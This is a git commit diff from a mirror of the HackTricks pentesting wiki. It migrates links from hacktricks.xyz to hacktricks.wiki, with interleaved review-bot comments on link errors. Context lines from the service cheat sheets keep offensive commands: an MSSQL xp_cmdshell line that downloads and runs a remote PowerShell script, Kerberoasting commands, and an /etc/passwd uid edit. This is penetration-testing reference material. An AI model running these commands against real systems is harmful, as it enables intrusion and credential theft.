mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Merge branch 'master' of github.com:HackTricks-wiki/hacktricks
commit 04f453fea8
@ -289,7 +289,7 @@
- [SmbExec/ScExec](windows-hardening/lateral-movement/smbexec.md)
- [WinRM](windows-hardening/lateral-movement/winrm.md)
- [WmiExec](windows-hardening/lateral-movement/wmiexec.md)
- [Pivoting to the Cloud$$external:https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements$$]()
- [Pivoting to the Cloud$$external:https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/index.html$$]()
- [Stealing Windows Credentials](windows-hardening/stealing-credentials/README.md)
- [Windows Credentials Protections](windows-hardening/stealing-credentials/credentials-protections.md)
- [Mimikatz](windows-hardening/stealing-credentials/credentials-mimikatz.md)
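Review bot: the replacement `Pivoting to the Cloud` entry changes the path as well as the host (`azure-security/az-lateral-movements` becomes `azure-security/az-lateral-movement-cloud-on-prem/index.html`), so this is a page rename rather than a mechanical domain swap; confirm the new URL resolves, because a stale `$$external:...$$` target in the summary is only noticed when someone follows it.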
@ -692,9 +692,9 @@

# ⛈️ Cloud Security

- [Pentesting Kubernetes$$external:https://cloud.hacktricks.xyz/pentesting-cloud/kubernetes-security$$]()
- [Pentesting Cloud (AWS, GCP, Az...)$$external:https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology$$]()
- [Pentesting CI/CD (Github, Jenkins, Terraform...)$$external:https://cloud.hacktricks.xyz/pentesting-ci-cd/pentesting-ci-cd-methodology$$]()
- [Pentesting Kubernetes$$external:https://cloud.hacktricks.wiki/en/pentesting-cloud/kubernetes-security/index.html$$]()
- [Pentesting Cloud (AWS, GCP, Az...)$$external:https://cloud.hacktricks.wiki/en/pentesting-cloud/pentesting-cloud-methodology.html$$]()
- [Pentesting CI/CD (Github, Jenkins, Terraform...)$$external:https://cloud.hacktricks.wiki/en/pentesting-ci-cd/pentesting-ci-cd-methodology.html$$]()

# 😎 Hardware/Physical Access

@ -4,7 +4,7 @@

## Basic Information

If you don't know what Electron is you can find [**lots of information here**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps). But for now just know that Electron runs **node**.\
If you don't know what Electron is you can find [**lots of information here**](https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#rce-xss--contextisolation). But for now just know that Electron runs **node**.\
And node has some **parameters** and **env variables** that can be use to **make it execute other code** apart from the indicated file.

### Electron Fuses

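Review bot: the added link carries a fragment (`#rce-xss--contextisolation`) that the removed one did not; generated heading anchors change whenever the target heading is edited, so either verify that the fragment exists on the target page or link the page without it. Unrelated but adjacent: the context line `that can be use to **make it execute other code**` should read `can be used`.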
@ -85,7 +85,7 @@ Entry_1:
Note: |
The Ident Protocol is used over the Internet to associate a TCP connection with a specific user. Originally designed to aid in network management and security, it operates by allowing a server to query a client on port 113 to request information about the user of a particular TCP connection.

https://book.hacktricks.xyz/pentesting/113-pentesting-ident
https://book.hacktricks.wiki/en/network-services-pentesting/113-pentesting-ident.html

Entry_2:
Name: Enum Users
@ -74,7 +74,7 @@ Entry_1:

For a device to participate in a NetBIOS network, it must have a unique name. This is achieved through a broadcast process where a "Name Query" packet is sent. If no objections are received, the name is considered available. Alternatively, a Name Service server can be queried directly to check for name availability or to resolve a name to an IP address.

https://book.hacktricks.xyz/pentesting/137-138-139-pentesting-netbios
https://book.hacktricks.wiki/en/network-services-pentesting/137-138-139-pentesting-netbios.html

Entry_2:
Name: Find Names
@ -54,7 +54,7 @@ Entry_1:

for more details check https://github.com/quentinhardy/odat/wiki

https://book.hacktricks.xyz/pentesting/1521-1522-1529-pentesting-oracle-listener
https://book.hacktricks.wiki/en/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.html

Entry_2:
Name: Nmap
@ -54,7 +54,7 @@ Entry_1:

for more details check https://github.com/quentinhardy/odat/wiki

https://book.hacktricks.xyz/pentesting/1521-1522-1529-pentesting-oracle-listener
https://book.hacktricks.wiki/en/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.html

Entry_2:
Name: Nmap
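Review bot: this hunk is identical to the preceding `@ -54,7 +54,7 @@ Entry_1:` hunk (same `odat` note, same Oracle listener URL), so the Oracle entry is maintained in two files; a single shared entry, or one file cross-referencing the other, would stop the two copies drifting the next time a link changes.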
@ -46,7 +46,7 @@ Entry_1:
The WHOIS protocol serves as a standard method for inquiring about the registrants or holders of various Internet resources through specific databases. These resources encompass domain names, blocks of IP addresses, and autonomous systems, among others. Beyond these, the protocol finds application in accessing a broader spectrum of information.


https://book.hacktricks.xyz/pentesting/pentesting-smtp
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smtp/index.html

Entry_2:
Name: Banner Grab
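Review bot: the note text in this hunk describes WHOIS, but both the removed and the added link point at `pentesting-smtp`, so the domain migration carries an existing wrong link over unchanged. Since the line is being edited anyway, point it at the WHOIS page (its filename is not visible in this hunk, so look it up rather than guess).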
@ -9,7 +9,7 @@ This port is used by **Redshift** to run. It's basically an AWS variation of **P
For more information check:

{{#ref}}
https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-services/aws-databases/aws-redshift-enum
https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html
{{#endref}}

{{#include ../banners/hacktricks-training.md}}
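Review bot: the `{{#ref}}` target drops the `aws-databases/` segment (`aws-services/aws-databases/aws-redshift-enum` becomes `aws-services/aws-redshift-enum.html`), so this is a page relocation rather than a host change; verify that the flattened path resolves before merging.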
@ -291,7 +291,7 @@ Entry_1:
print(s.run_cmd('ipconfig'))
print(s.run_ps('ipconfig'))

https://book.hacktricks.xyz/pentesting/pentesting-winrm
https://book.hacktricks.wiki/en/network-services-pentesting/5985-5986-pentesting-winrm.html

Entry_2:
Name: Hydra Brute Force
@ -119,7 +119,7 @@ Entry_1:
cd /mnt
nano into /etc/passwd and change the uid (probably 1000 or 1001) to match the owner of the files if you are not able to get in

https://book.hacktricks.xyz/pentesting/nfs-service-pentesting
https://book.hacktricks.wiki/en/network-services-pentesting/nfs-service-pentesting.html

Entry_2:
Name: Nmap
@ -233,7 +233,7 @@ Entry_1:
Domain_Name
exit

https://book.hacktricks.xyz/pentesting/pentesting-dns
https://book.hacktricks.wiki/en/todo/pentesting-dns.html

Entry_2:
Name: Banner Grab
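Review bot: the new DNS link lives under `todo/` (`https://book.hacktricks.wiki/en/todo/pentesting-dns.html`) while every other service link in this commit sits under `network-services-pentesting/`; a `todo` directory reads like a staging location, so confirm this is the intended permanent path before the cheat sheet ships with it.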
@ -245,7 +245,7 @@ Entry_1:
wget --no-passive-ftp --mirror 'ftp://anonymous:anonymous@10.10.10.98'
if PASV transfer is disabled

https://book.hacktricks.xyz/pentesting/pentesting-ftp
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-ftp/index.html

Entry_2:
Name: Banner Grab
@ -173,7 +173,7 @@ Entry_1:
Note: |
The Internet Message Access Protocol (IMAP) is designed for the purpose of enabling users to access their email messages from any location, primarily through an Internet connection. In essence, emails are retained on a server rather than being downloaded and stored on an individual's personal device. This means that when an email is accessed or read, it is done directly from the server. This capability allows for the convenience of checking emails from multiple devices, ensuring that no messages are missed regardless of the device used.

https://book.hacktricks.xyz/pentesting/pentesting-imap
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-imap.html

Entry_2:
Name: Banner Grab
@ -49,7 +49,7 @@ Entry_1:
Kerberos operates on a principle where it authenticates users without directly managing their access to resources. This is an important distinction because it underlines the protocol's role in security frameworks.
In environments like **Active Directory**, Kerberos is instrumental in establishing the identity of users by validating their secret passwords. This process ensures that each user's identity is confirmed before they interact with network resources. However, Kerberos does not extend its functionality to evaluate or enforce the permissions a user has over specific resources or services. Instead, it provides a secure way of authenticating users, which is a critical first step in the security process.

https://book.hacktricks.xyz/pentesting/pentesting-kerberos-88
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-kerberos-88/index.html

Entry_2:
Name: Pre-Creds
@ -396,7 +396,7 @@ Entry_1:
Note: |
The use of LDAP (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint.

https://book.hacktricks.xyz/pentesting/pentesting-ldap
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-ldap.html

Entry_2:
Name: Banner Grab
@ -673,7 +673,7 @@ Entry_1:
xp_cmdshell "powershell.exe -exec bypass iex(new-object net.webclient).downloadstring('http://10.10.14.60:8000/ye443.ps1')"


https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html

Entry_2:
Name: Nmap for SQL
@ -623,7 +623,7 @@ Entry_1:
Note: |
MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).

https://book.hacktricks.xyz/pentesting/pentesting-mysql
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-mysql.html

Entry_2:
Name: Nmap
@ -71,7 +71,7 @@ Entry_1:
Note: |
The Network Time Protocol (NTP) ensures computers and network devices across variable-latency networks sync their clocks accurately. It's vital for maintaining precise timekeeping in IT operations, security, and logging. NTP's accuracy is essential, but it also poses security risks if not properly managed.

https://book.hacktricks.xyz/pentesting/pentesting-ntp
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-ntp.html

Entry_2:
Name: Nmap
@ -98,7 +98,7 @@ Entry_1:
Note: |
Post Office Protocol (POP) is described as a protocol within the realm of computer networking and the Internet, which is utilized for the extraction and retrieval of email from a remote mail server**, making it accessible on the local device. Positioned within the application layer of the OSI model, this protocol enables users to fetch and receive email. The operation of POP clients typically involves establishing a connection to the mail server, downloading all messages, storing these messages locally on the client system, and subsequently removing them from the server. Although there are three iterations of this protocol, POP3 stands out as the most prevalently employed version.

https://book.hacktricks.xyz/network-services-pentesting/pentesting-pop
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-pop.html

Entry_2:
Name: Banner Grab
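Review bot: the context line of this hunk has an unbalanced `**` after `remote mail server`, which breaks the bold markup in the note; it is outside the changed line but trivial to fix while this entry is being touched.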
@ -136,7 +136,7 @@ Entry_1:
Note: |
Developed by Microsoft, the Remote Desktop Protocol (RDP) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, RDP client software is utilized by the user, and concurrently, the remote computer is required to operate RDP server software. This setup allows for the seamless control and access of a distant computer's desktop environment, essentially bringing its interface to the user's local device.

https://book.hacktricks.xyz/pentesting/pentesting-rdp
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-rdp.html

Entry_2:
Name: Nmap
@ -99,7 +99,7 @@ Entry_1:
Note: |
Portmapper is a service that is utilized for mapping network service ports to RPC (Remote Procedure Call) program numbers. It acts as a critical component in Unix-based systems, facilitating the exchange of information between these systems. The port associated with Portmapper is frequently scanned by attackers as it can reveal valuable information. This information includes the type of Unix Operating System (OS) running and details about the services that are available on the system. Additionally, Portmapper is commonly used in conjunction with NFS (Network File System), NIS (Network Information Service), and other RPC-based services to manage network services effectively.

https://book.hacktricks.xyz/pentesting/pentesting-rpcbind
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-rpcbind.html

Entry_2:
Name: rpc info
@ -559,7 +559,7 @@ Entry_1:
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request

https://book.hacktricks.xyz/pentesting/pentesting-smb
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smb/index.html

Entry_2:
Name: Enum4Linux
@ -559,7 +559,7 @@ Entry_1:
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request

https://book.hacktricks.xyz/pentesting/pentesting-smb
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smb/index.html

Entry_2:
Name: Enum4Linux
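Review bot: this hunk repeats the preceding `@ -559,7 +559,7 @@ Entry_1:` SMB hunk exactly (same `GetNPUsers.py` and `GetUserSPNs.py` lines, same URL), so the SMB entry exists in two files; keeping one source would avoid having to patch both on every link change.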
@ -564,7 +564,7 @@ Entry_1:
Note: |
SMTP (Simple Mail Transfer Protocol) is a TCP/IP protocol used in sending and receiving e-mail. However, since it is limited in its ability to queue messages at the receiving end, it is usually used with one of two other protocols, POP3 or IMAP, that let the user save messages in a server mailbox and download them periodically from the server.

https://book.hacktricks.xyz/pentesting/pentesting-smtp
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smtp/index.html

Entry_2:
Name: Banner Grab
@ -256,7 +256,7 @@ Entry_1:
Note: |
SNMP - Simple Network Management Protocol is a protocol used to monitor different devices in the network (like routers, switches, printers, IoTs...).

https://book.hacktricks.xyz/pentesting/pentesting-snmp
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smtp/index.html

Entry_2:
Name: SNMP Check
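Review bot: wrong target in the added line. This is the SNMP entry (`Name: SNMP Check`, note text about SNMP) and the removed link correctly went to `pentesting-snmp`, but the replacement is `.../pentesting-smtp/index.html`, the SMTP page already used by the SMTP hunk above. The new URL needs to keep `snmp` in the path; check the exact filename against the target site rather than guessing it.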
@ -57,7 +57,7 @@ Entry_1:
wireshark to hear creds being passed
tcp.port == 23 and ip.addr != myip

https://book.hacktricks.xyz/pentesting/pentesting-telnet
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-telnet.html

Entry_2:
Name: Banner Grab
@ -359,7 +359,7 @@ Entry_1:
Name: Notes
Description: Notes for Web
Note: |
https://book.hacktricks.xyz/pentesting/pentesting-web
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/index.html

Entry_2:
Name: Quick Web Scan
@ -602,7 +602,7 @@ According to the W3C documentation, the `window.location` and `document.location
* [GitHub - angular/dom\_security\_schema.ts](https://github.com/angular/angular/blob/main/packages/compiler/src/schema/dom\_security\_schema.ts)
* [XSS in Angular and AngularJS](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/XSS%20in%20Angular.md)
* [Angular Universal](https://angular.io/guide/universal)
* [DOM XSS](https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/dom-xss)
* [DOM XSS](https://book.hacktricks.wiki/en/pentesting-web/xss-cross-site-scripting/dom-xss.html)
* [Angular ElementRef](https://angular.io/api/core/ElementRef)
* [Angular Renderer2](https://angular.io/api/core/Renderer2)
* [Renderer2 Example: Manipulating DOM in Angular - TekTutorialsHub](https://www.tektutorialshub.com/angular/renderer2-angular/)
@ -5,7 +5,7 @@
Check this page if you want to learn more about enumerating and abusing Buckets:

{{#ref}}
https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum
https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#aws---s3-unauthenticated-enum
{{#endref}}

{{#include ../../../banners/hacktricks-training.md}}
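Review bot: the added S3 link appends a generated fragment (`#aws---s3-unauthenticated-enum`) that names the target page's own title heading; such anchors break silently when the heading is reworded and add nothing over the bare page URL. Suggest dropping the fragment and linking the `.html` page alone.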
@ -9,7 +9,7 @@ Firebase is a Backend-as-a-Services mainly for mobile application. It is focused
Learn more about Firebase in:

{{#ref}}
https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-services/gcp-databases-enum/gcp-firebase-enum
https://cloud.hacktricks.wiki/en/pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html
{{#endref}}

{{#include ../../../banners/hacktricks-training.md}}
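Review bot: the new Firebase path drops the `gcp-databases-enum/` segment present in the old one (`gcp-services/gcp-databases-enum/gcp-firebase-enum` becomes `gcp-services/gcp-firebase-enum.html`), so like the Redshift reference in this commit it is a page move rather than a host swap; verify the flattened path resolves.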
@ -89,7 +89,7 @@ Other useful extensions:

### Special extension tricks

If you are trying to upload files to a **PHP server**, [take a look at the **.htaccess** trick to execute code](https://book.hacktricks.xyz/pentesting/pentesting-web/php-tricks-esp#code-execution-via-httaccess).\
If you are trying to upload files to a **PHP server**, [take a look at the **.htaccess** trick to execute code](https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/php-tricks-esp/index.html#code-execution).\
If you are trying to upload files to an **ASP server**, [take a look at the **.config** trick to execute code](../../network-services-pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files).

The `.phar` files are like the `.jar` for java, but for php, and can be **used like a php file** (executing it with php, or including it inside a script...)

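Review bot: two points on the added line. The fragment changes from `#code-execution-via-httaccess` to `#code-execution`, which is broader than the `.htaccess` trick the sentence promises, so confirm the new anchor lands on that subsection. And the ASP sentence directly below uses a relative in-repo path (`../../network-services-pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files`); the PHP page is in the same book and should be linked the same relative way so it survives the next domain move without another sweep like this one.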
@ -158,7 +158,7 @@ aws cognito-idp update-user-attributes --region us-east-1 --access-token eyJraWQ
For more detailed info about how to abuse AWS cognito check:

{{#ref}}
https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum
https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html
{{#endref}}

### Abusing other Apps tokens <a href="#bda5" id="bda5"></a>
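Review bot: besides the host, the added URL changes the path segment `aws-pentesting/` to `aws-security/`. That matches the `aws-security` segment used by the S3 and Redshift references in this commit, but the removed line differed from them, so verify this target resolves rather than treating it as a pure domain swap.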
@ -170,7 +170,7 @@ document.body.append(anchor)
a = document.createElement("a")
log = []
for (let i = 0; i <= 0x10ffff; i++) {
a.href = `${String.fromCodePoint(i)}https://hacktricks.xyz`
a.href = `${String.fromCodePoint(i)}https://hacktricks.wiki`
if (a.hostname === "hacktricks.xyz") {
log.push(i)
}
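Review bot: the change is incomplete and turns the loop into a no-op. The added line sets `a.href` to `${String.fromCodePoint(i)}https://hacktricks.wiki`, but the unchanged check two lines later is still `if (a.hostname === "hacktricks.xyz")`, so no code point can match and `log` stays empty. Update the comparison to `"hacktricks.wiki"` in the same commit.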
@ -6,10 +6,10 @@ Last updated: 02/04/2023

This Cookies Policy applies to the following websites owned and operated by HackTricks team ("HackTricks", "we", "us" or "our"):

* hacktricks.xyz
* [www.hacktricks.xyz](http://www.hacktricks.xyz/)
* book.hacktricks.xyz
* cloud.hacktricks.xyz
* hacktricks.wiki
* [www.hacktricks.wiki](https://www.hacktricks.wiki/)
* book.hacktricks.wiki
* cloud.hacktricks.wiki

By using any of these websites, you agree to the use of cookies in accordance with this Cookies Policy. If you do not agree, please disable cookies in your browser settings or refrain from using our websites.

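Review bot: the policy body changes (the four `.xyz` domains become `.wiki`) but the `Last updated: 02/04/2023` line visible in the hunk header is left as is; a policy that now lists different covered sites should carry a new date. The switch from the plain-http `http://www.hacktricks.xyz/` link to `https://www.hacktricks.wiki/` is the right direction and can stay.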
@ -26,7 +26,7 @@ We use cookies on our websites for the following purposes:
3. Functionality cookies: These cookies enable our websites to remember choices you make, such as your language or region, to provide a more personalized experience.
4. Targeting/advertising cookies: These cookies are used to deliver relevant ads and marketing communications based on your interests, browsing history, and interactions with our websites.

Moreover, the pages book.hacktricks.xyz and cloud.hacktricks.xyz are hosted in Gitbook. You can find more information about Gitbooks cookies in [https://gitbook-1652864889.teamtailor.com/cookie-policy](https://gitbook-1652864889.teamtailor.com/cookie-policy).
Moreover, the pages book.hacktricks.wiki and cloud.hacktricks.wiki are hosted in Gitbook. You can find more information about Gitbooks cookies in [https://gitbook-1652864889.teamtailor.com/cookie-policy](https://gitbook-1652864889.teamtailor.com/cookie-policy).

### Third-party cookies

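Review bot: the added line keeps the statement that `book.hacktricks.wiki` and `cloud.hacktricks.wiki` are hosted in Gitbook and only swaps the domain, yet the new URLs elsewhere in this commit end in `.html` under an `/en/` prefix and the pages carry `{{#ref}}`/`{{#include}}` directives, which does not look like a Gitbook-hosted site. Confirm the hosting claim and the linked Gitbook cookie policy still describe where these pages are served; a cookies policy naming the wrong processor is a compliance defect, not a typo.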
@ -58,7 +58,7 @@ If you need a bibtex you can use something like:
author = {"HackTricks Team" or the Authors name of the specific page/trick},
title = {Title of the Specific Page},
year = {Year of Last Update (check it at the end of the page)},
url = {\url{https://book.hacktricks.xyz/specific-page}},
url = {\url{https://book.hacktricks.wiki/specific-page}},
}
```

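Review bot: the bibtex placeholder `https://book.hacktricks.wiki/specific-page` does not match the shape of the real `.wiki` URLs introduced in this commit, which carry an `/en/` prefix and a `.html` suffix (for example `https://book.hacktricks.wiki/en/.../index.html`); a placeholder that mirrors the real pattern helps people cite correctly. Something like `https://book.hacktricks.wiki/en/specific-page.html` would be closer.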
@ -67,7 +67,7 @@ If you just have access to an AD environment but you don't have any credentials/
- Gather credentials [**impersonating services with Responder**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
- Access host by [**abusing the relay attack**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack)
- Gather credentials **exposing** [**fake UPnP services with evil-S**](../../generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md)[**SDP**](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856)
- [**OSINT**](https://book.hacktricks.xyz/external-recon-methodology):
- [**OSINT**](https://book.hacktricks.wiki/en/generic-methodologies-and-resources/external-recon-methodology/index.html):
- Extract usernames/names from internal documents, social media, services (mainly web) inside the domain environments and also from the publicly available.
- If you find the complete names of company workers, you could try different AD **username conventions (**[**read this**](https://activedirectorypro.com/active-directory-user-naming-convention/)). The most common conventions are: _NameSurname_, _Name.Surname_, _NamSur_ (3letters of each), _Nam.Sur_, _NSurname_, _N.Surname_, _SurnameName_, _Surname.Name_, _SurnameN_, _Surname.N_, 3 _random letters and 3 random numbers_ (abc123).
- Tools:
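Review bot: the OSINT bullet is rewritten as an absolute `https://book.hacktricks.wiki/...` URL while the neighbouring bullets in the same list (Responder, relay attack, evil-SSDP) use relative `../../generic-methodologies-and-resources/...md` paths. The external recon page is in the same book, so a relative link to it under `generic-methodologies-and-resources/` would keep the list consistent and immune to future domain moves. Also note the split link text `evil-S` + `SDP` on the third bullet, which renders as two links.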
@ -685,7 +685,7 @@ rdp-sessions-abuse.md
## AD -> Azure & Azure -> AD

{{#ref}}
https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/azure-ad-connect-hybrid-identity
https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/index.html
{{#endref}}

## Some General Defenses

@ -10,9 +10,9 @@ There are different different ways to execute commands in external systems, here
- [**AtExec / SchtasksExec**](atexec.md)
- [**WinRM**](winrm.md)
- [**DCOM Exec**](dcom-exec.md)
- [**Pass the cookie**](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/az-pass-the-cookie) (cloud)
- [**Pass the PRT**](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/pass-the-prt) (cloud)
- [**Pass the AzureAD Certificate**](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/az-pass-the-certificate) (cloud)
- [**Pass the cookie**](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.html) (cloud)
- [**Pass the PRT**](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html) (cloud)
- [**Pass the AzureAD Certificate**](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.html) (cloud)

{{#include ../../banners/hacktricks-training.md}}
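Review bot: the three cloud links here move consistently to `az-lateral-movement-cloud-on-prem/...html`, matching the summary and the `AD -> Azure` reference above, so they look right. Minor style point in the context shown in the hunk header: `There are different different ways` has a doubled word that could be fixed in the same commit.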